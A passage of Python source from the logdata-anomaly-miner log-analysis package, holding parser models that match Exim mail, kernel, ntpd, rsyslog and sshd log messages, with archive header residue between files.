"), DelimitedDataModelElement("mail_to", b" "), FixedDataModelElement("msg", b" The account or domain may not exist, they may be blacklisted, or missing the" b" proper dns entries.\\n550 Sender verify failed") ]), SequenceModelElement("unable_to_verify", [ FixedDataModelElement("msg", b": SMTP error from remote mail server after MAIL FROM:<"), DelimitedDataModelElement("mail_from", b">"), FixedDataModelElement("s3", b">" + size_str), size, FixedDataModelElement("s4", host_str), host, FixedDataModelElement("s5", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code553 + b"<"), DelimitedDataModelElement("mail_to", b">"), FixedDataModelElement("msg", b"> unable to verify address\\nVerify that SMPT authentication has been enabled.") ]) ]) ]), SequenceModelElement("mail_delivery_failure", [ msg_id, FixedDataModelElement("s0", b" <= <>" + r_str), r, FixedDataModelElement("s1", u_str), u, FixedDataModelElement("s2", p_str), p, FixedDataModelElement("s3", s_str), s, FixedDataModelElement("s4", t_str), FixedDataModelElement("t", b"\"Mail delivery failed: returning message to sender\""), FixedDataModelElement("s5", b" for "), VariableByteDataModelElement("mail_from", alphabet) ]), SequenceModelElement("mail_flagged_as_spam1", [ msg_id, FixedDataModelElement("s0", h_str), h, FixedDataModelElement("s1", b" ["), host_ip, FixedDataModelElement("s2", b"]:"), port, FixedDataModelElement("msg", b" Warning: \"SpamAssassin as marka22 detected message as spam ("), DelimitedDataModelElement("version", b")"), FixedDataModelElement("s3", b")\"") ]), SequenceModelElement("mail_flagged_as_spam2", [ msg_id, FixedDataModelElement("s0", b" <="), host_ip, FixedDataModelElement("s1", h_str), DelimitedDataModelElement("h", b"["), FixedDataModelElement("s2", b"["), host_ip, FixedDataModelElement("s3", b"]:"), port, FixedDataModelElement("s4", p_str), p, FixedDataModelElement("s5", s_str), s, FixedDataModelElement("s6", id_str), msg_id, FixedDataModelElement("s7", t_str), AnyByteDataModelElement("msg") ]), SequenceModelElement("mail_flagged_as_spam3", [ msg_id, FixedDataModelElement("s0", b" => "), DelimitedDataModelElement("user", b" "), DelimitedDataModelElement("s1", b"<", consume_delimiter=True), mail_from, FixedDataModelElement("s2", b" [>" + r_str), r, FixedDataModelElement("s3", t_str), AnyByteDataModelElement("t") ]), SequenceModelElement("mail_flagged_as_spam4", [ msg_id, FixedDataModelElement("msg", b" Completed"), OptionalMatchModelElement("opt", SequenceModelElement("seq", [ FixedDataModelElement("s0", b" "), dtme, FixedDataModelElement("s1", b" "), msg_id, FixedDataModelElement("s2", h_str), h, FixedDataModelElement("s3", b" ["), host_ip, FixedDataModelElement("s4", b"]:"), port, FixedDataModelElement("msg", b" Warning: \"SpamAssassin as marka22 detected message as spam ("), DelimitedDataModelElement("version", b")"), FixedDataModelElement("s5", b")\"") ])) ]), SequenceModelElement("mail_flagged_as_spam5", [ msg_id, FixedDataModelElement("s0", b" <= "), mail_from, FixedDataModelElement("s1", h_str), h, FixedDataModelElement("s2", b" ["), host_ip, FixedDataModelElement("s3", b"]:"), port, FixedDataModelElement("s4", p_str), p, FixedDataModelElement("s5", s_str), s, FixedDataModelElement("s6", id_str), msg_id, FixedDataModelElement("s7", t_str + b'"'), DelimitedDataModelElement("t", b"\""), FixedDataModelElement("s8", b'" for '), mail_from, FixedDataModelElement("s9", b" "), dtme, FixedDataModelElement("s10", b" "), msg_id, FixedDataModelElement("s11", b" => "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s12", b" <"), mail_from, FixedDataModelElement("s13", b" [>" + r_str), r, FixedDataModelElement("s14", t_str), AnyByteDataModelElement("t") ]), SequenceModelElement("mail_spam_allowed1", [ msg_id, FixedDataModelElement("s0", h_str), DelimitedDataModelElement("h", b"["), FixedDataModelElement("s1", b"["), host_ip, FixedDataModelElement("s2", b"]:"), port, FirstMatchModelElement("fm", [ FixedDataModelElement("msg", b" Warning: Message has been scanned: no virus or other harmful content was found"), SequenceModelElement("seq", [ FixedDataModelElement( "msg", b" Warning: \"SpamAssassin as cpaneleximscanner detected OUTGOING smtp message as NOT spam ("), DecimalFloatValueModelElement("spam_value", value_sign_type=DecimalFloatValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("s3", b")\"") ]) ]) ]), SequenceModelElement("mail_spam_allowed2", [ msg_id, FixedDataModelElement("s0", b" <= "), mail_from, FixedDataModelElement("s1", h_str), h, FixedDataModelElement("s2", b" ["), host_ip, FixedDataModelElement("s3", b"]:"), port, FixedDataModelElement("s4", p_str), p, FixedDataModelElement("s5", x_str), x, FixedDataModelElement("s6", a_str), a, FixedDataModelElement("s7", s_str), s, FixedDataModelElement("s8", t_str), t, FixedDataModelElement("msg", b" plates\" for "), AnyByteDataModelElement("mail_to") ]), SequenceModelElement("mail_spam_allowed3", [ msg_id, FixedDataModelElement("msg", b" SMTP connection outbound "), DecimalIntegerValueModelElement("timestamp"), FixedDataModelElement("s0", b" "), msg_id, FixedDataModelElement("s1", b" "), DelimitedDataModelElement("domain", b" "), FixedDataModelElement("s2", b" "), AnyByteDataModelElement("mail_to") ]), SequenceModelElement("mail_spam_allowed4", [ msg_id, FixedDataModelElement("s0", b" => "), mail_from, FixedDataModelElement("s1", r_str), r, FixedDataModelElement("s2", t_str), t, FixedDataModelElement("s3", h_str), h, FixedDataModelElement("s4", b" ["), host_ip, FixedDataModelElement("s5", b"]" + x_str), x, FixedDataModelElement("s6", c_str), c, FixedDataModelElement("s7", b"\" "), dtme, FixedDataModelElement("s8", b" "), msg_id, FixedDataModelElement("s9", b" Completed"), ]), SequenceModelElement("mail_flagged_as_spam1", [ msg_id, FixedDataModelElement("s0", h_str), h, FixedDataModelElement("s1", b" ["), host_ip, FixedDataModelElement("s2", b"]:"), port, FixedDataModelElement("msg", b" Warning: \"SpamAssassin as sfgthib detected message as spam ("), DelimitedDataModelElement("version", b")"), FixedDataModelElement("s3", b")\" "), dtme, FixedDataModelElement("s4", b" "), msg_id, FixedDataModelElement("s5", h_str), h, FixedDataModelElement("s6", b" ["), host_ip, FixedDataModelElement("s7", b"]:"), port, FixedDataModelElement("msg", b" Warning: Message has been scanned: no virus or other harmful content was found") ]), SequenceModelElement("mail_flagged_as_spam2", [ msg_id, FixedDataModelElement("s0", b" <= "), mail_from, FixedDataModelElement("s1", h_str), h, FixedDataModelElement("s2", b" ["), host_ip, FixedDataModelElement("s3", b"]:"), port, FixedDataModelElement("s4", p_str), p, FixedDataModelElement("s5", x_str), x, FixedDataModelElement("s6", s_str), s, FixedDataModelElement("s7", id_str), msg_id, FixedDataModelElement("s8", t_str), t, FixedDataModelElement("s9", b" for "), AnyByteDataModelElement("mail_to") ]), SequenceModelElement("mail", [ msg_id, FirstMatchModelElement("dir", [ SequenceModelElement("dir_in", [ FixedDataModelElement("in", b" <= "), FirstMatchModelElement("fm", [ SequenceModelElement("seq1", [ FixedDataModelElement("brack", b"<>"), FirstMatchModelElement("fm", [ SequenceModelElement("r", [ FixedDataModelElement("r_str", r_str), r, FixedDataModelElement("u_str", u_str), u, ]), SequenceModelElement("h", [ FixedDataModelElement("h_str", h_str), h, FixedDataModelElement("sp1", b" ["), ip, FixedDataModelElement("sp1", b"]"), ]) ]), FixedDataModelElement("sp2", p_str), p, FixedDataModelElement("sp2", p_str), s, ]), SequenceModelElement("seq2", [ DelimitedDataModelElement("mail", b" "), FixedDataModelElement("user_str", u_str), DelimitedDataModelElement("user", b" "), FixedDataModelElement("p_str", p_str), p, FixedDataModelElement("s_str", s_str), s, OptionalMatchModelElement( "id", SequenceModelElement("id", [ FixedDataModelElement("id_str", id_str), AnyByteDataModelElement("id") ]) ) ]) ]) ]), SequenceModelElement("dir_out", [ FixedDataModelElement("in", b" => "), DelimitedDataModelElement("name", b" "), FixedDataModelElement("sp1", b" "), OptionalMatchModelElement( "mail_opt", SequenceModelElement("mail", [ FixedDataModelElement("brack1", b"("), DelimitedDataModelElement("brack_mail", b")"), FixedDataModelElement("brack2", b") "), ])), FixedDataModelElement("sp2", b"<"), DelimitedDataModelElement("mail", b">"), FixedDataModelElement("r_str", b">" + r_str), r, FixedDataModelElement("t_str", t_str), VariableByteDataModelElement("t", alphabet), ]), SequenceModelElement("aster", [ FixedDataModelElement("aster", b" ** "), DelimitedDataModelElement("command", b" "), FixedDataModelElement("headers_str", b' Too many "Received" headers - suspected mail loop')]), FixedDataModelElement("completed", b" Completed"), FixedDataModelElement("frozen", b" Message is frozen"), FixedDataModelElement("frozen", b" Frozen (delivery error message)") ]) ]), ]) ]), SequenceModelElement("no_date_seq", [ FixedDataModelElement("s0", b"TO:<"), DelimitedDataModelElement("to_mail", b">"), FixedDataModelElement("s1", b">" + host_str), host, FixedDataModelElement("s2", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code450), # status code has to be 450 in this error message. DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" Client host rejected: cannot find your hostname, ["), host_ip, FixedDataModelElement("s3", b"] "), dtme, FixedDataModelElement("s4", b" "), msg_id, FixedDataModelElement("s5", b" ** "), DelimitedDataModelElement("to_mail", b">"), FixedDataModelElement("msg", b">: retry timeout exceeded") ]), SequenceModelElement("invalid_dns_record", [ FixedDataModelElement("msg", b"SMTP error from remote mail server after RCPT TO:" + host_str), DelimitedDataModelElement("host", b"["), FixedDataModelElement("s0", b"["), host_ip, FixedDataModelElement("status_code", b"]" + status_code550), FixedDataModelElement("msg", b"-Sender has no A, AAAA, or MX DNS records. "), DelimitedDataModelElement("host", b"\\"), FixedDataModelElement("s1", b"\\n550 l "), DelimitedDataModelElement("host", b"\\"), FixedDataModelElement("msg", b"\\nVerify the zone file in "), DelimitedDataModelElement("file", b" "), FixedDataModelElement("msg", b" for the correct information. If it appear correct, you can run named-checkzone " b"domain.com domain.com.db to verify if named is able to load the zone.") ]), SequenceModelElement("mail_rejected", [ FixedDataModelElement("msg", b"Diagnostic-Code: X-Postfix;" + host_str1), host, FixedDataModelElement("s0", b" ["), host_ip, FixedDataModelElement("status_code", b"] said" + status_code550 + b" "), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" Message rejected due to content restrictions (in reply to end of DATA command)\\nWhen you see " b"an error such as 550 "), VariableByteDataModelElement("version", alphabet) ]), SequenceModelElement("mail_authentication_error", [ FixedDataModelElement("msg", b"Final-Recipient: rfc822;"), DelimitedDataModelElement("mail_from", b"\\"), FixedDataModelElement("msg", b"\\nAction: failed\\nStatus: "), DelimitedDataModelElement("status", b"\\"), FixedDataModelElement("msg", b"\\nDiagnostic-Code: smtp;550-Please turn on SMTP Authentication in your mail client.\\n550-"), host, FixedDataModelElement("s0", b" ["), host_ip, FixedDataModelElement("s1", b"]:"), port, FixedDataModelElement("msg", b" is not permitted to relay 550 through this server without authentication.") ]), SequenceModelElement("bad_helo_record", [ DelimitedDataModelElement("cipher_suite", b" "), FixedDataModelElement("msg", b" " + smtp_error_from_remote), DelimitedDataModelElement("mail_from", b">"), FixedDataModelElement("s0", b">" + size_str), size, FixedDataModelElement("s1", host_str), host, FixedDataModelElement("s2", b" ["), host_ip, OptionalMatchModelElement("optional", SequenceModelElement("seq", [ FixedDataModelElement("to", b".."), DecimalIntegerValueModelElement("upper_ip") ])), FixedDataModelElement("status_code", b"]" + status_code550), FixedDataModelElement("msg", b" \"REJECTED - Bad HELO - Host impersonating ["), DelimitedDataModelElement("original_host", b"]"), FixedDataModelElement("s3", b"]\"") ]), SequenceModelElement("domain_not_exists", [ FixedDataModelElement("msg", smtp_error_from_remote), DelimitedDataModelElement("mail_from", b">"), FixedDataModelElement("s0", b">" + host_str), host, FixedDataModelElement("s1", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code553), FixedDataModelElement("msg", b"sorry, your domain does not exists.") ]), SequenceModelElement("rejected_due_to_spam_content", [ DateTimeModelElement("time", b"[%H:%M:%S"), FixedDataModelElement("hosts", b" hosts"), DecimalIntegerValueModelElement("hosts_number"), FixedDataModelElement("s0", b" "), RepeatedElementDataModelElement("rep", FirstMatchModelElement("fm", [ SequenceModelElement("seq", [ dtme, FixedDataModelElement("s1", b" "), msg_id, FixedDataModelElement("s2", b" <= <>" + r_str), r, FixedDataModelElement("s3", u_str), u, FixedDataModelElement("s4", p_str), p, FixedDataModelElement("s5", s_str), s, FixedDataModelElement("s6", t_str + b'"'), DelimitedDataModelElement("t", b'"'), FixedDataModelElement("s7", b'" for '), mail_from, FixedDataModelElement("s8", b" "), dtme, FixedDataModelElement("s9", b" cwd="), DelimitedDataModelElement("cwd", b" "), FixedDataModelElement("s10", b" "), DecimalIntegerValueModelElement("args_num"), FixedDataModelElement("s11", b" args: "), RepeatedElementDataModelElement("rep", FirstMatchModelElement("fm", [ SequenceModelElement("seq", [ dtme, FixedDataModelElement("s12", b" "), msg_id, FixedDataModelElement("s13", b" ** "), mail_from, FixedDataModelElement("s14", r_str), r, FixedDataModelElement("s15", t_str), DelimitedDataModelElement("t", b":"), FixedDataModelElement("msg", b": SMTP error from remote mail server after end of data" + host_str), DelimitedDataModelElement("domain", b" "), FixedDataModelElement("s16", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code554), FixedDataModelElement("msg", b"rejected due to spam content") ]), # this is problematic as the number of arguments is variable! SequenceModelElement("arg_seq", [ DelimitedDataModelElement("arg", b" "), FixedDataModelElement("s17", b" ") ]) ])) ]), # this is problematic as the number of hosts is variable! SequenceModelElement("host_seq", [ host, FixedDataModelElement("s8", b" ") ]) ])) ]), ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/KernelMsgParsingModel.py000066400000000000000000000035541437606560100332560ustar00rootroot00000000000000"""This module defines a parser for kernelmsg.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement def get_model(): """Return a model to parse messages from kernel logging.""" type_children = [ SequenceModelElement("ipv4-martian", [ FixedDataModelElement("s0", b"IPv4: martian "), FixedWordlistDataModelElement("direction", [b"source", b"destination"]), FixedDataModelElement("s1", b" "), IpAddressDataModelElement("destination"), FixedDataModelElement("s2", b" from "), IpAddressDataModelElement("source"), FixedDataModelElement("s3", b", on dev "), AnyByteDataModelElement("interface")]), SequenceModelElement("net-llheader", [ FixedDataModelElement("s0", b"ll header: "), AnyByteDataModelElement("data") ]), AnyByteDataModelElement("unparsed") ] model = SequenceModelElement("kernel", [ FixedDataModelElement("sname", b"kernel: "), OptionalMatchModelElement("opt", SequenceModelElement("seq", [ FixedDataModelElement("opt_s0", b"]"), DelimitedDataModelElement("timestamp", b"]"), FixedDataModelElement("opt_s1", b"] "), ])), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/NtpParsingModel.py000066400000000000000000000121261437606560100321230ustar00rootroot00000000000000"""This module defines the parsing model for ntpd logs.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(): """Get the model.""" interface_name_model = VariableByteDataModelElement("interface", b"0123456789abcdefghijklmnopqrstuvwxyz.") dtme = DateTimeModelElement("expire-date", b"%Y-%m-%dT%H:%M:%SZ") type_children = [ SequenceModelElement("exit", [ FixedDataModelElement("s0", b"ntpd exiting on signal "), DecimalIntegerValueModelElement("signal") ]), SequenceModelElement("listen-drop", [ FixedDataModelElement("s0", b"Listen and drop on "), DecimalIntegerValueModelElement("fd"), FixedDataModelElement("s1", b" "), interface_name_model, FixedDataModelElement("s2", b" "), FirstMatchModelElement("address", [ IpAddressDataModelElement("ipv4"), DelimitedDataModelElement("ipv6", b" "), FixedDataModelElement("ipv6_missing", b"[::]") ]), FirstMatchModelElement("udp", [ FixedDataModelElement("s3", b" UDP 123"), FixedDataModelElement("s3", b":123")]) ]), SequenceModelElement("listen-normal", [ FixedDataModelElement("s0", b"Listen normally on "), DecimalIntegerValueModelElement("fd"), FixedDataModelElement("s1", b" "), interface_name_model, FixedDataModelElement("s2", b" "), IpAddressDataModelElement("ip"), FirstMatchModelElement("msg", [ FixedDataModelElement("port-new", b":123"), FixedDataModelElement("port-old", b" UDP 123") ]) ]), SequenceModelElement("listen-routing", [ FixedDataModelElement("s0", b"Listening on routing socket on fd #"), DecimalIntegerValueModelElement("fd"), FixedDataModelElement("s1", b" for interface updates") ]), SequenceModelElement("soliciting-pool", [ FixedDataModelElement("s0", b"Soliciting pool server "), IpAddressDataModelElement("pool-server-ip") ]), SequenceModelElement("starting", [ FixedDataModelElement("s0", b"ntpd "), DelimitedDataModelElement("version", b" "), FixedDataModelElement("s1", b" (1): Starting") ]), SequenceModelElement("no-root", [ FixedDataModelElement("s0", b"must be run as root, not uid "), DecimalIntegerValueModelElement("uid") ]), SequenceModelElement("leapsecond-file", [ FixedDataModelElement("s0", b"leapsecond file ('"), DelimitedDataModelElement("file", b"'"), FixedDataModelElement("s1", b"'): "), FirstMatchModelElement("first", [ FixedDataModelElement("msg", b"good hash signature"), SequenceModelElement("seq", [ FixedDataModelElement("s2", b"loaded, expire="), dtme, FixedDataModelElement("s3", b" last="), dtme, FixedDataModelElement("s4", b" ofs="), DecimalIntegerValueModelElement("ofs") ]) ]) ]), FixedDataModelElement("unable-to-bind", b"unable to bind to wildcard address :: - another process may be running - EXITING"), FixedDataModelElement("new-interfaces", b"new interface(s) found: waking up resolver"), FixedDataModelElement("ntp-io", b"ntp_io: estimated max descriptors: 1024, initial socket boundary: 16"), FixedDataModelElement("peers-refreshed", b"peers refreshed"), FixedDataModelElement("log-file", b"logging to file /var/log/ntplog"), FixedDataModelElement("command-line", b"Command line: ntpd"), SequenceModelElement("precision", [ FixedDataModelElement("s0", b"proto: precision = "), DecimalFloatValueModelElement("precision"), FixedDataModelElement("s1", b" usec ("), DecimalIntegerValueModelElement("usec", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("s2", b")") ])] model = SequenceModelElement("ntpd", [ FixedDataModelElement("sname", b"ntpd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/RsyslogParsingModel.py000066400000000000000000000075441437606560100330340ustar00rootroot00000000000000"""This module defines a parser for rsyslog.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement def get_model(): """Return a model to parse a su session information message after any standard logging preamble, e.g. from syslog.""" type_children = [ SequenceModelElement("gidchange", [ FixedDataModelElement("s0", b"rsyslogd's groupid changed to "), DecimalIntegerValueModelElement("gid") ]), SequenceModelElement("statechange", [ FixedDataModelElement("s0", b'[origin software="rsyslogd" swVersion="'), DelimitedDataModelElement("version", b'"'), FixedDataModelElement("s1", b'" x-pid="'), DecimalIntegerValueModelElement("pid"), FirstMatchModelElement("fm", [ FixedDataModelElement("s2", b'" x-info="https://www.rsyslog.com"] '), FixedDataModelElement("s2", b'" x-info="http://www.rsyslog.com"] ') ]), FirstMatchModelElement("type", [ FixedDataModelElement("HUPed", b"rsyslogd was HUPed"), FixedDataModelElement("start", b"start") ]) ]), SequenceModelElement("uidchange", [ FixedDataModelElement("s0", b"rsyslogd's userid changed to "), DecimalIntegerValueModelElement("uid") ]), SequenceModelElement("action", [ FixedDataModelElement("s0", b"action '"), DelimitedDataModelElement("action", b"'"), FirstMatchModelElement("fm", [ SequenceModelElement("resumed", [ FixedDataModelElement("s1", b"' resumed (module '"), DelimitedDataModelElement("module", b"'"), FixedDataModelElement("s2", b"') [try http://www.rsyslog.com/e/"), DecimalIntegerValueModelElement("number"), FixedDataModelElement("s3", b" ]") ]), SequenceModelElement("suspended", [ FixedDataModelElement("s1", b"' suspended, next retry is "), DelimitedDataModelElement("dayname", b" "), FixedDataModelElement("s2", b" "), DateTimeModelElement("dtme", b"%b %d %H:%M:%S %Y"), FixedDataModelElement("s2", b" [try http://www.rsyslog.com/e/"), DecimalIntegerValueModelElement("number"), FixedDataModelElement("s3", b" ]") ]) ]), ]), SequenceModelElement("cmd", [ FixedDataModelElement("s0", b"command '"), DelimitedDataModelElement("command", b"'"), FixedDataModelElement( "s1", b"' is currently not permitted - did you already set it via a RainerScript command (v6+ config)? ["), DelimitedDataModelElement("version", b"]", consume_delimiter=True) ]) ] model = SequenceModelElement("rsyslog", [ FixedDataModelElement("sname", b"rsyslogd"), OptionalMatchModelElement("opt", FirstMatchModelElement("fm", [ DecimalIntegerValueModelElement("number"), SequenceModelElement("seq", [ FixedDataModelElement("s0", b"-"), DecimalIntegerValueModelElement("number") ]) ])), FixedDataModelElement("s0", b": "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/SshdParsingModel.py000066400000000000000000000434211437606560100322650ustar00rootroot00000000000000"""This module provides support for parsing of sshd messages.""" from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement def get_model(user_name_model=None): """Return a model to parse a sshd information message after any standard logging preamble, e.g. from syslog.""" if user_name_model is None: user_name_model = VariableByteDataModelElement("user", b"0123456789abcdefghijklmnopqrstuvwxyz.-") from_str = b" from " port = b" port " preauth = b" [preauth]" type_children = [ SequenceModelElement("accepted key", [ FixedDataModelElement("s0", b"Accepted publickey for "), user_name_model, FixedDataModelElement("s1", from_str), IpAddressDataModelElement("clientip"), FixedDataModelElement("s2", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b" ssh2: "), DelimitedDataModelElement("asym-algorithm", b" ", consume_delimiter=True), VariableByteDataModelElement("fingerprint", b"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/:"), OptionalMatchModelElement("opt", SequenceModelElement("seq", [ FixedDataModelElement("s4", b" ID "), DelimitedDataModelElement("id", b" "), FixedDataModelElement("s5", b" (serial "), DecimalIntegerValueModelElement("serial"), FixedDataModelElement("s6", b") CA "), AnyByteDataModelElement("algorithm_details") ])) ]), SequenceModelElement("btmp-perm", [ FixedDataModelElement("s0", b"Excess permission or bad ownership on file /var/log/btmp") ]), SequenceModelElement("close-sess", [ FixedDataModelElement("s0", b"Close session: user "), user_name_model, FixedDataModelElement("s1", from_str), IpAddressDataModelElement("clientip"), FixedDataModelElement("s2", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b" id "), DecimalIntegerValueModelElement("userid") ]), SequenceModelElement("closing", [ FixedDataModelElement("s0", b"Closing connection to "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("closed", [ FixedDataModelElement("s0", b"Connection closed by "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("clientip"), SequenceModelElement("seq", [ FixedWordlistDataModelElement("user-type", [b"authenticating", b"invalid"]), FixedDataModelElement("s1", b" user "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s2", b" "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("ip"), IpAddressDataModelElement("ipv6", ipv6=True) ]), FixedDataModelElement("s3", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s4", b" [preauth]") ]) ]) ]), SequenceModelElement("connect", [ FixedDataModelElement("s0", b"Connection from "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s2", b" on "), IpAddressDataModelElement("serverip"), FixedDataModelElement("s3", port), DecimalIntegerValueModelElement("sport") ]), SequenceModelElement("disconnectreq", [ FixedDataModelElement("s0", b"Received disconnect from "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s2", b":"), DecimalIntegerValueModelElement("session"), FixedDataModelElement("s3", b": "), FixedWordlistDataModelElement("reason", [b"disconnected by user"]) ]), SequenceModelElement("disconnected", [ FixedDataModelElement("s0", b"Disconnected from "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port") ]), FixedDataModelElement("error-bind", b"error: bind: Cannot assign requested address"), SequenceModelElement("error-max-auth", [ FixedDataModelElement("s0", b"error: maximum authentication attempts exceeded for "), OptionalMatchModelElement("opt", FixedDataModelElement("invalid", b"invalid user ")), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s1", b" from "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("from_ip"), IpAddressDataModelElement("from_ip_v6", ipv6=True) ]), FixedDataModelElement("s2", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b" ssh2 [preauth]") ]), FixedDataModelElement("error-cert-exp", b"error: Certificate invalid: expired"), FixedDataModelElement("error-cert-not-yet-valid", b"error: Certificate invalid: not yet valid"), FixedDataModelElement("error-cert-not-listed-principal", b"error: Certificate invalid: name is not a listed principal"), FixedDataModelElement("error-refused-by-options", b"error: Refused by certificate options"), SequenceModelElement("error-channel-setup", [ FixedDataModelElement("s0", b"error: channel_setup_fwd_listener: cannot listen to port: "), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("error-auth-key", [ FixedDataModelElement("s0", b"error: Authentication key "), DelimitedDataModelElement("asym-algorithm", b" "), FixedDataModelElement("s1", b" "), DelimitedDataModelElement("hash", b" "), FixedDataModelElement("s2", b" revoked by file "), AnyByteDataModelElement("file") ]), SequenceModelElement("error-load-key", [ FixedDataModelElement("s0", b"error: Could not load host key: "), AnyByteDataModelElement("file") ]), SequenceModelElement("ident-missing", [ FixedDataModelElement("s0", b"Did not receive identification string from "), IpAddressDataModelElement("clientip") ]), SequenceModelElement("invalid-user", [ FixedDataModelElement("s0", b"Invalid user "), DelimitedDataModelElement("user", from_str), FixedDataModelElement("s1", from_str), FirstMatchModelElement("fm", [ IpAddressDataModelElement("from_ip"), IpAddressDataModelElement("from_ip_v6", ipv6=True) ]), FixedDataModelElement("s2", b" port "), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("invalid-user-auth-req", [ FixedDataModelElement("s0", b"input_userauth_request: invalid user "), DelimitedDataModelElement("user", preauth), FixedDataModelElement("s1", preauth) ]), SequenceModelElement("postppk", [ FixedDataModelElement("s0", b"Postponed publickey for "), user_name_model, FixedDataModelElement("s1", from_str), IpAddressDataModelElement("clientip"), FixedDataModelElement("s2", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b" ssh2 [preauth]") ]), SequenceModelElement("readerr", [ FixedDataModelElement("s0", b"Read error from remote host "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", b": Connection timed out") ]), SequenceModelElement("disconnect", [ FixedDataModelElement("s0", b"Received disconnect from "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("from_ip"), IpAddressDataModelElement("from_ip_v6", ipv6=True) ]), FixedDataModelElement("s1", b": 11: "), FirstMatchModelElement("reason", [ FixedDataModelElement("disconnected", b"disconnected by user"), SequenceModelElement("remotemsg", [ DelimitedDataModelElement("msg", preauth), FixedDataModelElement("s0", preauth) ]) ]) ]), SequenceModelElement("signal", [ FixedDataModelElement("s0", b"Received signal "), DecimalIntegerValueModelElement("signal"), FixedDataModelElement("s1", b"; terminating.") ]), SequenceModelElement("server", [ FixedDataModelElement("s0", b"Server listening on "), DelimitedDataModelElement("serverip", b" "), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s2", b".") ]), SequenceModelElement("oom-adjust", [ FixedDataModelElement("s0", b"Set /proc/self/oom_score_adj "), OptionalMatchModelElement("from", FixedDataModelElement("default", b"from 0 ")), FixedDataModelElement("s1", b"to "), DecimalIntegerValueModelElement("newval", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL) ]), SequenceModelElement("session-start", [ FixedDataModelElement("s0", b"Starting session: "), FirstMatchModelElement("sess-info", [ SequenceModelElement("shell", [ FixedDataModelElement("s0", b"shell on "), DelimitedDataModelElement("terminal", b" ") ]), SequenceModelElement("subsystem", [ FixedDataModelElement("s0", b"subsystem \"sftp\"") ]), SequenceModelElement("forced-command", [ FixedDataModelElement("s0", b"forced-command (key-option) \""), DelimitedDataModelElement("command", b"\" for "), FixedDataModelElement("s1", b"\"") 